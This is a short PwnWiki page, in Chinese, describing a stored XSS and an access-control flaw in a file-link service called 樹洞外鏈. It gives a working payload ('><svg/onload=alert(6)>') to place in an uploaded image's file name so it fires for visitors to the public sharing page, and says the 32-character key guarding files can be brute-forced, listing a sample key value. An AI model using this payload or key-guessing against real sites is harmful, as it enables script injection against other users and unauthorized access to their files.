樹洞外鏈XSS&越權漏洞

From PwnWiki

Revision as of 12:57, 14 April 2021 by Pwnwiki (talk | contribs)

(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)

XSS

><svg/onload=alert(6)>

上傳一張圖片，在創建文件名添加xss，公開是分享文件廣場。

越權漏洞

條件，可以爆破。32位隨機字符需要key值。

c74bffaa1cd2a4eda30bd72fe5453bb0

Retrieved from "https://pwnwiki.com/index.php?title=樹洞外鏈XSS%26越權漏洞&oldid=1647"